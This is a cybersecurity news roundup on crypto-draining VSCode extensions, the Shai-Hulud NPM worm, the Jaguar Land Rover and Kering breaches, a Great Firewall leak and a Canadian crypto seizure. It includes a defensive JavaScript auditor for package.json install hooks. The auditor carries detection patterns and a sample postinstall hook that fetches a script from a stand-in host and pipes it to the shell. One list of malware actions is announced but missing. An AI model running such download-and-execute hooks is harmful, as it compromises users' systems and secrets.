Escalation of Cyber Threats: From Cryptocurrency Theft to Data Leaks of Luxury Brand Clients

We have compiled the most significant cybersecurity news from the past week.

Software developers are increasingly attracting crypto thieves. According to cybersecurity researchers at Koi Security, the hacking group WhiteCobra has targeted users of coding environments such as VSCode, Cursor, and Windsurf. They have uploaded 24 malicious extensions onto the Visual Studio Marketplace and the Open VSX registry.

One of the victims of these "drainers" was leading Ethereum developer Zak Cole. He reported that cybercriminals stole cryptocurrency using a plugin for the AI code editor Cursor. Cole explained that the extension had all the characteristics of a benign product: a professionally designed logo, a detailed description, and 54,000 downloads on OpenVSX, Cursor’s official registry.

Koi Security believes that WhiteCobra belongs to the same group that, in July, stole digital assets worth $500,000 from a Russian blockchain programmer.

“Cross-compatibility and the lack of proper verification when publishing on these platforms make them ideal for attackers seeking to conduct widespread campaigns,” states the Koi Security report.

The wallet draining starts with the execution of the extension's main file, extension.js, which closely resembles the standard Hello World boilerplate that ships with every VSCode extension template. The malware then unpacks a stealer matched to the victim's operating system.

WhiteCobra’s targets are digital asset holders with amounts ranging from $10,000 to $500,000. Analysts believe the group can initiate a new campaign in under three hours.

So far, it has been difficult to halt the attackers; while malicious plugins are removed from OpenVSX, new ones immediately appear in their place.

Researchers recommend using only reputable projects and exercising caution with new releases that suddenly amass a large number of downloads and positive reviews in a short period.

The Royal Canadian Mounted Police conducted the largest cryptocurrency seizure in Canadian history. This was brought to attention by on-chain investigator ZachXBT.

Authorities seized digital assets worth over 56 million Canadian dollars (approximately $40.5 million) from the TradeOgre platform. The closure of this cryptocurrency exchange marked the first incident of its kind in the country.

The investigation began in June 2024 at the behest of Europol. It revealed that the platform violated Canadian laws and had not registered with the Financial Transactions and Reports Analysis Centre as a money exchange service.

Investigators suspect that a large portion of the funds used on TradeOgre originated from criminal sources. The platform attracted cybercriminals due to the absence of mandatory user identification.

According to the police statement, transaction data obtained from TradeOgre will be analyzed to enable charges. The investigation is ongoing.

Following an attack on the NPM platform aimed at injecting malware into JavaScript packages, attackers shifted to a strategy of disseminating a full-fledged "worm." The incident is escalating, with reports of over 500 compromised NPM packages.

The coordinated campaign known as Shai-Hulud commenced on September 15 with the compromise of the NPM package @ctrl/tinycolor, which is downloaded more than 2 million times weekly.

According to analysts at Truesec, the campaign has significantly expanded within this timeframe and now includes packages published under the CrowdStrike namespace.

Experts state that the compromised versions contain functionality that extracts the package’s tar archive, modifies the package.json file, injects a local script, repackages it, and republishes it. Upon installation, a script is automatically executed that downloads and runs TruffleHog, a legitimate tool for scanning for secrets and discovering tokens.

Truesec believes the attack is rapidly scaling up and becoming more sophisticated. Although the attackers are employing many old techniques, they have significantly enhanced their approach, evolving it into a fully autonomous “worm.” The malware performs the following actions:

What sets this attack apart is its propagation model: rather than relying on a single infected package, it spreads itself autonomously across NPM packages.
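The mechanism described above (a package.json modified to carry an install-time script that npm runs automatically) can be checked for on the defender's side. The following is an added example, not code from the article, Truesec or npm; it audits package.json manifests for install lifecycle hooks and flags a hook that first appears in a new release, using constructed sample manifests:

```javascript
// Added example (not code from the article, Truesec or npm): audit package.json
// manifests for install-time lifecycle hooks of the kind Shai-Hulud injects.
// Runs under Node.js; every manifest below is constructed for illustration.

// npm executes these hooks during `npm install`, so a script placed here runs
// without the package ever being required by the application.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Patterns that deserve a second look inside an install hook: fetching remote
// content, piping it to a shell, or invoking a secret scanner like TruffleHog.
const INDICATORS = [
  /\bcurl\b/i, /\bwget\b/i, /\|\s*(ba)?sh\b/i, /trufflehog/i, /\bnode\s+-e\b/i,
];

// Report every install hook in a manifest, together with matched indicators.
function auditManifest(manifestJson) {
  const pkg = JSON.parse(manifestJson);
  const scripts = pkg.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    if (typeof scripts[hook] !== 'string') continue;
    const indicators = INDICATORS.filter((re) => re.test(scripts[hook]))
      .map((re) => re.source);
    findings.push({ hook, command: scripts[hook], indicators });
  }
  return { name: pkg.name, version: pkg.version, findings };
}

// The strongest signal in a worm-style compromise: an install hook that appears
// in a new release of a package whose previous release had none.
function addedInstallHooks(prevJson, nextJson) {
  const before = new Set(auditManifest(prevJson).findings.map((f) => f.hook));
  return auditManifest(nextJson).findings
    .map((f) => f.hook)
    .filter((hook) => !before.has(hook));
}

// Constructed manifests: a clean release, the same package after a hook was
// injected, and a hook that downloads and pipes a script to the shell.
const CLEAN = JSON.stringify({ name: 'example-color-lib', version: '4.1.0',
  scripts: { test: 'node test.js' } });
const INJECTED = JSON.stringify({ name: 'example-color-lib', version: '4.1.1',
  scripts: { test: 'node test.js', postinstall: 'node setup_bundle.js' } });
const DOWNLOADER = JSON.stringify({ name: 'example-color-lib', version: '4.1.2',
  scripts: { postinstall: 'curl -sSL https://example.invalid/s.sh | sh' } });

console.log(auditManifest(DOWNLOADER).findings);
console.log('hooks added between releases:', addedInstallHooks(CLEAN, INJECTED));
```

Running the same comparison against the previous published version of each dependency during a lockfile update surfaces exactly the change the worm makes; setting `ignore-scripts=true` in .npmrc stops such hooks from executing at all.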

Jaguar Land Rover (JLR) has been unable to resume production for the third consecutive week due to a cyberattack. The luxury car manufacturer announced that its production lines will remain halted at least until September 24.

The company confirmed that attackers stole information from its network, but it has not yet attributed the attack to a specific hacker group.

According to BleepingComputer, the cybercriminal group Scattered Lapsus$ Hunters claimed responsibility for the attack, posting screenshots of JLR’s internal system on a Telegram channel. The message alleges that the hackers also deployed ransomware on the compromised infrastructure of the company.

The BBC estimates that each week of downtime costs the company a minimum of £50 million (about $68 million). Meanwhile, The Telegraph estimates losses for the same period to be around $100 million. JLR’s suppliers are worried about being unable to handle the unexpected crisis and fear bankruptcy.

On September 12, researchers from the Great Firewall Report team reported the largest data leak in the history of the "Great Firewall of China."

Approximately 600 GB of internal documents, source code, and internal communications used to create and maintain China’s national traffic filtering system were leaked online.

Researchers state that the leak includes comprehensive build systems for traffic tracking platforms and modules responsible for recognizing and slowing down specific circumvention tools. Most of the stack is aimed at detecting unauthorized VPNs in China.

Great Firewall Report specialists claim that some of the documentation pertains to the Tiangou platform—a commercial product intended for use by ISPs and border gateways. Experts believe that the program’s initial iterations were deployed on HP and Dell servers.

Moreover, the disclosed documents mention the installation of this software in 26 data centers in Myanmar. The system was allegedly managed by a state telecommunications company and integrated into major internet traffic exchange points, allowing for both mass blocking and selective filtering.

According to Wired and Amnesty International, the infrastructure has also been exported to Pakistan, Ethiopia, Kazakhstan, and other countries, where it is used in conjunction with other lawful traffic interception platforms.

On September 15, Kering, the parent company of numerous luxury brands, confirmed a data breach affecting customers of its subsidiaries Gucci, Balenciaga, Alexander McQueen, and Yves Saint Laurent.

According to the BBC, hackers stole personal information, including names, email addresses, phone numbers, home addresses, and overall spending amounts by customers in stores worldwide.

The attack is believed to be linked to the hacker group ShinyHunters, which claims to have stolen personal data from at least 7 million people, although the actual number of victims is likely much higher.

The group is also suspected of involvement in the theft of multiple databases hosted on Salesforce. Several companies, including Allianz Life, Google, Qantas, and Workday, have confirmed the theft of data as a result of these massive hacks.